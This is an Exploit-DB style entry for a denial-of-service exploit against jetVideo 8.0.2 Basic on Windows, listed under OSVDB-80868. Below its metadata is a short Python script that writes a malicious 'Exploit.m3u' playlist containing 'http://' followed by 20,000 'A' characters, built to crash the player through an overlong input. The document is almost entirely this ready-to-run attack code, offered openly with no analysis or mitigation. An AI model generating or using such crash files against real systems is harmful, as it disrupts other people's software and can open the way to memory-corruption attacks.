jetVideo 8.0.2 - Denial of Service
Author: Senator of Pirates
type: dos
platform: windows
port:
date_added: 2012-02-10
date_updated: 2012-02-10
verified: 0
codes: OSVDB-80868
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comJVD8002_BASIC.exe
# Exploit Title: [jetVideo Crash Exploit]
# Author: [Senator of Pirates]
# Email : [Senator.of.Pirates.team@gmail.com]
# Software Link: [http://www.jetaudio.com/download/jetvideo.html]
# Version: [8.0.2 Basic]
# Tested on: [Windows XP PS3 En]
header = "http://"
junk = "A" * 20000
payload = (header+junk)
f = open("Exploit.m3u","wb")
f.write(payload)
f.close()